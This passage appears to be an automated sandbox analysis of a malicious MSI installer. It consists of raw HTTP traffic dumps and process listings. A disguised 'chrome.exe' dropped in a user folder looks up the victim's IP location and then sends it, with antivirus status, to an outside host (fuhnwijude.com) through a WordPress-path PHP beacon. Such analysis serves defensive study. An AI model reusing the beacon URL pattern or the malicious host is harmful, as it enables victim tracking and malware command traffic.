                                                  2024-08-23 17:16:18 UTC1369INData Raw: 6e 69 63 61 20 58 69 61 6f 6d 69 20 31 34 20 55 6c 74 72 61 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 63 6f 64 65 66 69 6c 65 27 3e 3c 69 66 72 61 6d 65 20 73 61 6e 64 62 6f 78 20 64 61 74 61 2d 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 65 6d 62 65 64 3f 70 3d 33 30 34 35 46 63 72 65 43 73 6a 68 26 70 72 65 76 69 65 77 3d 73 61 6e 64 62 6f 78 27 3e 3c 2f 69 66 72 61 6d 65 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 70 2f 33 30 34 35 46 63 72 65 43 73 6a 68 27 20 74 69 74 6c 65 3d 27 4f 70 65 6e 20 2d 20 56 69 73 75 61 6c 69 7a 7a 61 20 54 45 53 54 27 3e 54 45 53 54 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 63 6f 64 65 66 69 6c 65
                                                  Data Ascii: nica Xiaomi 14 Ultra</a></div><div class='codefile'><iframe sandbox data-src='https://codewith.it/embed?p=3045FcreCsjh&preview=sandbox'></iframe><a href='https://codewith.it/p/3045FcreCsjh' title='Open - Visualizza TEST'>TEST</a></div><div class='codefile
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 61 2d 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 65 6d 62 65 64 3f 70 3d 64 38 62 58 4b 7a 26 70 72 65 76 69 65 77 3d 73 61 6e 64 62 6f 78 27 3e 3c 2f 69 66 72 61 6d 65 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 77 69 74 68 2e 69 74 2f 70 2f 64 38 62 58 4b 7a 27 20 74 69 74 6c 65 3d 27 4f 70 65 6e 20 2d 20 56 69 73 75 61 6c 69 7a 7a 61 20 4a 53 20 53 74 72 75 74 74 75 72 65 20 64 61 74 69 20 65 20 66 75 6e 7a 69 6f 6e 69 20 65 73 32 27 3e 4a 53 20 53 74 72 75 74 74 75 72 65 20 64 61 74 69 20 65 20 66 75 6e 7a 69 6f 6e 69 20 65 73 32 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 0a 20 20 20 20 20 20 3c
                                                  Data Ascii: a-src='https://codewith.it/embed?p=d8bXKz&preview=sandbox'></iframe><a href='https://codewith.it/p/d8bXKz' title='Open - Visualizza JS Strutture dati e funzioni es2'>JS Strutture dati e funzioni es2</a></div> </div> </div></div> <div> <
                                                  2024-08-23 17:16:18 UTC1369INData Raw: 70 61 6e 3e 46 6f 72 6d 61 74 20 63 6f 64 65 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 6d 65 6e 75 49 74 65 6d 20 63 6f 70 79 43 6f 64 65 42 74 6e 27 20 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 6d 69 63 6e 20 73 6d 49 63 6e 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 70 79 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 43 6f 70 79 20 63 6f 6e 74 65 6e 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 27 6d 6f 64
                                                  Data Ascii: pan>Format code</span> </div> <div class='menuItem copyCodeBtn' > <span class='micn smIcn'> copy </span> <span>Copy content</span> </div> </div> </button> <button class='mod


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.44973234.117.59.814434820C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-23 17:16:18 UTC250OUTGET /json HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  Host: ipinfo.io
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  2024-08-23 17:16:19 UTC345INHTTP/1.1 200 OK
                                                  access-control-allow-origin: *
                                                  Content-Length: 319
                                                  content-type: application/json; charset=utf-8
                                                  date: Fri, 23 Aug 2024 17:16:19 GMT
                                                  x-content-type-options: nosniff
                                                  via: 1.1 google
                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close
                                                  2024-08-23 17:16:19 UTC319INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                                                  Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449734198.20.110.1064434820C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-23 17:16:20 UTC438OUTGET /wp-admin/js/cnt/system/conta.php?IDR=8.46.123.33&PC=818225&DTF=23/08/2024%2013:16:15&UF=New%20York&CAP=New%20York%20City&APP=%20Nao%20tem%20aplicativo&ANT=Topaz%20OFD%20Nao&SPM=AGOSTO HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  Host: www.fuhnwijude.com
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  2024-08-23 17:16:20 UTC471INHTTP/1.1 302 Found
                                                  Connection: close
                                                  x-powered-by: PHP/7.4.33
                                                  location: http://google.com/
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 0
                                                  date: Fri, 23 Aug 2024 17:16:20 GMT
                                                  server: LiteSpeed
                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                  vary: User-Agent
                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449740216.58.212.1644434820C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-08-23 17:16:22 UTC334OUTGET /?gws_rd=ssl HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip
                                                  User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36
                                                  Connection: Keep-Alive
                                                  Host: www.google.com
                                                  Cookie: AEC=AVYB7cpAq0GIpRy9NZo9DvJvUBBN_YmsGsCKv3vpUtvLYDCsdqWAVvUU9g
                                                  2024-08-23 17:16:22 UTC1067INHTTP/1.1 200 OK
                                                  Content-Type: text/html; charset=UTF-8
                                                  Strict-Transport-Security: max-age=31536000
                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-bQdFvwYzptPWBmgDKdBcfw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                  Permissions-Policy: unload=()
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Date: Fri, 23 Aug 2024 17:16:22 GMT
                                                  Server: gws
                                                  Cache-Control: private
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Expires: Fri, 23 Aug 2024 17:16:22 GMT
                                                  Set-Cookie: NID=517=fqEQ_aSe3UsEvjj_RqHsv1aS3klaKfPnT_JkMmqXuszL2pJt-nGvytW-hQIj1nAdAhNOWUgrcdswCwgDejxb1M505gGXaJM_yGq9Int348bp60NEJXf2roQzKMIFy7-2dnJKNRrDCjSzbaknabgV0VKuL4MD96ZJJGUpOT49afDkah_3Kfrm3glr; expires=Sat, 22-Feb-2025 17:16:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Accept-Ranges: none
                                                  Vary: Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2024-08-23 17:16:22 UTC323INData Raw: 32 39 39 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 61 64 64 72 65 73 73 3d 6e 6f 22 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72
                                                  Data Ascii: 2994<!doctype html><html lang="en"><head><meta charset="UTF-8"><meta content="width=device-width,minimum-scale=1.0" name="viewport"><meta content="telephone=no" name="format-detection"><meta content="address=no" name="format-detection"><meta content="or
                                                  2024-08-23 17:16:22 UTC1390INData Raw: 6b 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 70 72 6f 64 75 63 74 2f 31 78 2f 67 73 61 5f 61 6e 64 72 6f 69 64 5f 31 34 34 64 70 2e 70 6e 67 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 73 74 79 6c 65 3e 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 47 6f 6f 67 6c 65 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a
                                                  Data Ascii: k href="/images/branding/product/1x/gsa_android_144dp.png" rel="icon"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><style>@font-face{font-family:'Google Sans';font-style:normal;font-weight:400;font-display:
                                                  2024-08-23 17:16:22 UTC1390INData Raw: 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 53 65 61 72 63 68 48 65 61 64 53 74 61 72 74 22 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 51 64 46 76 77 59 7a 70 74 50 57 42 6d 67 44 4b 64 42 63 66 77 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 35 73 50 49 5a 75 53 71 49 4b 32 50 39 75 38 50 7a 5a 6e 72 71 51 77 27 2c 6b 45 58 50 49 3a 27 33 31 27 2c 6b 42 4c 3a 27 42 6b 30 48 27 2c 6b 4f 50 49 3a 38 39 39 37 38 34 34 39 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a 61 2e 73 74 76 73 63 29 3f 67 6f 6f 67 6c 65 2e 6b 45 49 3d 5f 67 2e 6b 45 49 3a 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d
                                                  Data Ascii: rformance.mark("SearchHeadStart");</script><script nonce="bQdFvwYzptPWBmgDKdBcfw">(function(){var _g={kEI:'5sPIZuSqIK2P9u8PzZnrqQw',kEXPI:'31',kBL:'Bk0H',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=
                                                  2024-08-23 17:16:22 UTC1390INData Raw: 28 63 3d 74 28 61 2c 62 2c 65 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b 67 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 67 5d 7d 3b 61 2e 73 72 63 3d 63 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 62 3b 72 65 74 75 72 6e 20 74 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67 6f 6f 67 6c 65 29
                                                  Data Ascii: (c=t(a,b,e,d,k));if(c=r(c)){a=new Image;var g=n.length;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google)
                                                  2024-08-23 17:16:22 UTC1390INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 63 3d 7b 62 74 66 69 3a 66 61 6c 73 65 2c 63 34 74 3a 74 72 75 65 2c 63 61 66 3a 66 61 6c 73 65 2c 63 61 70 3a 32 35 30 30 2c 63 66 72 3a 66 61 6c 73 65 2c 63 6c 69 3a 66 61 6c 73 65 2c 63 72 70 3a 74 72 75 65 2c 63 73 70 3a 66 61 6c 73 65 2c 63 73 78 73 3a 66 61 6c 73 65 2c 64 69 3a 66 61 6c 73 65 2c 64 6f 69 75 3a 30 2c 66 6c 61 3a 66 61 6c 73 65 2c 66 6c 69 3a 66 61 6c 73 65 2c 67 6c 3a 74 72 75 65 2c 69 72 73 66 3a 66 61 6c 73 65 2c 6c 68 63 3a 66 61 6c 73 65 2c 6d 61 72 62 3a 74 72 75 65 2c 6d 63 63 3a 66 61 6c 73 65 2c 70 63 69 3a 74 72 75 65 2c 72 61 66 3a 66 61 6c 73 65 2c 74 61 66 3a 74 72 75 65 2c 74 69 6d 6c 3a 66 61 6c 73 65 2c 74 70 72 63 3a 66 61 6c 73 65 2c 76 69 73 3a 74 72 75 65 2c
                                                  Data Ascii: (function(){google.c={btfi:false,c4t:true,caf:false,cap:2500,cfr:false,cli:false,crp:true,csp:false,csxs:false,di:false,doiu:0,fla:false,fli:false,gl:true,irsf:false,lhc:false,marb:true,mcc:false,pci:true,raf:false,taf:true,timl:false,tprc:false,vis:true,
                                                  2024-08-23 17:16:22 UTC1390INData Raw: 6e 20 67 3b 62 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3b 6d 2b 66 3c 30 3f 67 3d 32 3a 6d 3e 3d 62 26 26 28 67 3d 34 29 3b 69 66 28 6b 2b 6e 3c 30 7c 7c 6b 3e 3d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 29 29 67 7c 3d 38 3b 65 6c 73 65 20 69 66 28 64 29 7b 6b 3d 68 2e 6c 65 66 74 3b 69 66 28 21 63 29 66 6f 72 28 3b 61 26 26 61 21 3d 3d 64 3b 61 3d 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 6b 2b 3d 61 2e 73 63 72 6f 6c 6c 4c 65 66 74 3b 64 3d 65 28 64 29 3b 69 66 28 6b 2b 6e 3c 64 2e 6c 65 66
                                                  Data Ascii: n g;b=window.innerHeight||document.documentElement.clientHeight;m+f<0?g=2:m>=b&&(g=4);if(k+n<0||k>=(window.innerWidth||document.documentElement.clientWidth))g|=8;else if(d){k=h.left;if(!c)for(;a&&a!==d;a=a.parentElement)k+=a.scrollLeft;d=e(d);if(k+n<d.lef
                                                  2024-08-23 17:16:22 UTC1390INData Raw: 69 73 2e 41 7c 7c 74 68 69 73 2e 69 7c 7c 45 28 74 68 69 73 29 3b 77 26 26 21 63 26 26 46 28 74 68 69 73 29 7d 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 72 6c 6c 28 61 2e 67 2c 21 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 47 28 61 2c 44 61 74 65 2e 6e 6f 77 28 29 29 7d 29 7d 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 2e 43 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 61 2e 67 3b 76 61 72 20 63 3b 61 3a 7b 66 6f 72 28 63 3d 62 3b 63 3b 63 3d 63 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 63 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 47 2d 53 43 52 4f 4c 4c 49 4e 47 2d 43 41 52 4f 55 53 45 4c 22 7c 7c 68 61 26 26 63 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 58 4e 66 41 55 62 22 29 29 62 72 65
                                                  Data Ascii: is.A||this.i||E(this);w&&!c&&F(this)},E=function(a){google.rll(a.g,!0,function(){G(a,Date.now())})},F=function(a){if(a.C===void 0){var b=a.g;var c;a:{for(c=b;c;c=c.parentElement)if(c.tagName==="G-SCROLLING-CAROUSEL"||ha&&c.classList.contains("XNfAUb"))bre
                                                  2024-08-23 17:16:22 UTC1390INData Raw: 7b 7d 2c 6d 3a 7b 7d 7d 7d 3b 67 6f 6f 67 6c 65 2e 74 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 7c 7c 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 28 61 29 3b 63 3d 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 44 61 74 65 2e 6e 6f 77 28 29 3b 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 7c 7c 28 62 3d 5b 62 5d 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 2c 65 3b 65 3d 62 5b 64 2b 2b 5d 3b 29 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 2e 74 5b 65 5d 3d 63 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 2e 65 5b 62 5d 3d 63 7d 3b 67 6f 6f 67 6c 65 2e 63 2e 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29
                                                  Data Ascii: {},m:{}}};google.tick=function(a,b,c){google.timers[a]||google.startTick(a);c=c!==void 0?c:Date.now();b instanceof Array||(b=[b]);for(var d=0,e;e=b[d++];)google.timers[a].t[e]=c};google.c.e=function(a,b,c){google.timers[a].e[b]=c};google.c.b=function(a,b)
                                                  2024-08-23 17:16:22 UTC599INData Raw: 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 51 28 61 29 7b 50 28 61 2e 74 69 6d 65 53 74 61 6d 70 29 26 26 43 28 64 6f 63 75 6d 65 6e 74 2c 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 51 2c 21 30 29 7d 67 6f 6f 67 6c 65 2e 63 2e 66 68 3d 49 6e 66 69 6e 69 74 79 3b 42 28 64 6f 63 75 6d 65 6e 74 2c 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 51 2c 21 30 29 3b 50 28 30 29 3b 78 26 26 28 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 3d 72 61 2c 42 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 6c 6f 61 64 22 2c 4b 2c 21 30 29 2c 42 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 65 72 72 6f 72 22 2c 4b 2c 21 30 29 29 3b 67 6f 6f 67 6c 65 2e 63 76
                                                  Data Ascii: turn!0}return!1}function Q(a){P(a.timeStamp)&&C(document,"visibilitychange",Q,!0)}google.c.fh=Infinity;B(document,"visibilitychange",Q,!0);P(0);x&&(google.c.oil=ra,B(document.documentElement,"load",K,!0),B(document.documentElement,"error",K,!0));google.cv
                                                  2024-08-23 17:16:22 UTC411INData Raw: 31 39 34 0d 0a 61 5b 62 2b 2b 5d 3b 29 52 28 63 29 3b 67 6f 6f 67 6c 65 2e 61 66 74 71 3d 6e 75 6c 6c 7d 7d 67 6f 6f 67 6c 65 2e 63 61 66 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 61 66 74 71 3d 3d 3d 6e 75 6c 6c 3f 52 28 61 29 3a 28 67 6f 6f 67 6c 65 2e 61 66 74 71 3d 67 6f 6f 67 6c 65 2e 61 66 74 71 7c 7c 5b 5d 2c 67 6f 6f 67 6c 65 2e 61 66 74 71 2e 70 75 73 68 28 61 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 53 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 61 76 69 67 61 74 69 6f 6e 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 61 76 69 67 61 74 69 6f 6e 2e 74 79 70 65 7d 3b 76 61 72 20 74 61 3d 77 69 6e 64 6f 77
                                                  Data Ascii: 194a[b++];)R(c);google.aftq=null}}google.caft=function(a){google.aftq===null?R(a):(google.aftq=google.aftq||[],google.aftq.push(a))};function S(){return window.performance&&window.performance.navigation&&window.performance.navigation.type};var ta=window


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:13:16:00
                                                  Start date:23/08/2024
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\nf963-5d-qns6-w812.msi"
                                                  Imagebase:0x7ff7fe290000
                                                  File size:69'632 bytes
                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:13:16:00
                                                  Start date:23/08/2024
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                  Imagebase:0x7ff7fe290000
                                                  File size:69'632 bytes
                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:13:16:01
                                                  Start date:23/08/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E1CF8BADC61849C4C5214BC163FD5145
                                                  Imagebase:0x5e0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:13:16:07
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:13:16:09
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:13:16:11
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
                                                  MD5 hash:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:13:16:12
                                                  Start date:23/08/2024
                                                  Path:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
                                                  Imagebase:0xd30000
                                                  File size:2'252'904 bytes
